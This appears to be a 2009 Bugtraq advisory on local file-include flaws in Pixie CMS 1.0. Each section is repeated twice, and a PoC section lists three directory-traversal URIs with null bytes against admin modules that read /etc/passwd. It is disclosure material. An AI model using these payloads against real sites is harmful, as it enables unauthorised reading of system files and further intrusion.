Pixie CMS Multiple Local File Include Vulnerabilities
BID:33475
Info
Pixie CMS Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 33475 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 27 2009 12:00AM |
| Updated: | Jan 29 2009 08:09PM |
| Credit: | Digital Security Research Group [DSecRG] |
| Vulnerable: |
Scott Evans Pixie CMS 1.0 |
| Not Vulnerable: | |
Discussion
Pixie CMS Multiple Local File Include Vulnerabilities
Pixie CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Pixie CMS 1.0 is vulnerable; other versions may also be affected.
Pixie CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Pixie CMS 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
Pixie CMS Multiple Local File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[installdir]/admin/admin/modules/mod_settings.php?pixie_user=DSecRG&pixie_user_privs=2&x=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/admin/admin/modules/mod_myaccount.php?pixie_user=DSecRG&m=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/admin/admin/modules/mod_myaccount.php?pixie_user=DSecRG&x=../../../../../../../../../../../../../etc/passwd%00
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[installdir]/admin/admin/modules/mod_settings.php?pixie_user=DSecRG&pixie_user_privs=2&x=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/admin/admin/modules/mod_myaccount.php?pixie_user=DSecRG&m=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/admin/admin/modules/mod_myaccount.php?pixie_user=DSecRG&x=../../../../../../../../../../../../../etc/passwd%00
Solution / Fix
Pixie CMS Multiple Local File Include Vulnerabilities
Solution:
The vendor indicates that these issues have been patched. Please contact the vendor for details.
Solution:
The vendor indicates that these issues have been patched. Please contact the vendor for details.